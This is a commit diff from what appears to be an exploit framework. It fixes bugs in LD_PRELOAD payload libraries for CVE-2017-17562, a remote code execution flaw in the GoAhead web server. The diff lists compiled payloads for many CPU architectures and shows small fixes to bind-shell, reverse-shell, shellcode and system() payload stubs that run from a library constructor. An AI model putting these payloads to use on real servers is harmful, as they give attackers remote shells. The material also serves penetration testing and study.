Resolve a bug in reverse_tcp and segfaults across payloads

2017-12-29 14:18:55 -06:00 · 2017-12-29 14:18:55 -06:00 · 0b9fbe5a63
parent 68f4d4480e
commit 0b9fbe5a63
64 changed files with 16 additions and 9 deletions
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-aarch64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-aarch64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-armel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-armel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-armhf.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-armhf.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips64el.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mips64el.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mipsel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-mipsel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc64le.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-powerpc64le.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-s390x.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-s390x.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-sparc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-sparc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-sparc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-sparc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-x86.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-x86.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-x86_64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind-linux-glibc-x86_64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-bind.c
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-bind.c
@ -89,7 +89,8 @@ static void _run_payload_(void) __attribute__((constructor));
 static void _run_payload_(void)
 {
    unsetenv("LD_PRELOAD");
-    if (! fork()) {
+    if (! fork())
      _bind_tcp_shell();
-    }
+
    exit(0);
 }
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-aarch64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-aarch64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-armel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-armel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-armhf.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-armhf.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips64el.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mips64el.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mipsel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-mipsel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc64le.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-powerpc64le.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-s390x.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-s390x.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-sparc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-sparc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-sparc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-sparc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-x86.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-x86.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-x86_64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse-linux-glibc-x86_64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-reverse.c
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-reverse.c
@ -53,7 +53,9 @@ static void _reverse_tcp_shell(void) {
  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
  for (i=0; i<10; i++) {
-    connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr));
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
      break;
    }
  }
  for (i=0; i<3; i++) {
@ -75,7 +77,8 @@ static void _run_payload_(void) __attribute__((constructor));
 static void _run_payload_(void)
 {
    unsetenv("LD_PRELOAD");
-    if (! fork()) {
+    if (! fork())
      _reverse_tcp_shell();
-    }
+
    exit(0);
 }
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-aarch64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-aarch64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-armel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-armel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-armhf.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-armhf.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips64el.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mips64el.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mipsel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-mipsel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc64le.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-powerpc64le.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-s390x.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-s390x.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-sparc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-sparc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-sparc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-sparc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-x86.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-x86.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-x86_64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode-linux-glibc-x86_64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c
@ -37,8 +37,8 @@ static void _run_payload_(void)
  memcpy(mem, payload, PAYLOAD_SIZE);
  fn = (void(*)())mem;
-  if (! fork()) {
+  if (! fork())
    fn();
-    kill(getpid(), 9);
+
-  }
+  exit(0);
 }
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-aarch64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-aarch64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-armel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-armel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-armhf.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-armhf.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips64el.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mips64el.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mipsel.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-mipsel.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc64le.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-powerpc64le.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-s390x.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-s390x.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-sparc.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-sparc.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-sparc64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-sparc64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-x86.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-x86.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-x86_64.so.gz
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system-linux-glibc-x86_64.so.gz
--- a/data/exploits/CVE-2017-17562/goahead-cgi-system.c
+++ b/data/exploits/CVE-2017-17562/goahead-cgi-system.c
@ -23,7 +23,10 @@ static void _run_payload_(void) __attribute__((constructor));
 static void _run_payload_(void)
 {
    int dummy = 0;
    unsetenv("LD_PRELOAD");
    if (! fork())
-      system((const char*)payload);
+      dummy = system((const char*)payload);
    exit(dummy);
 }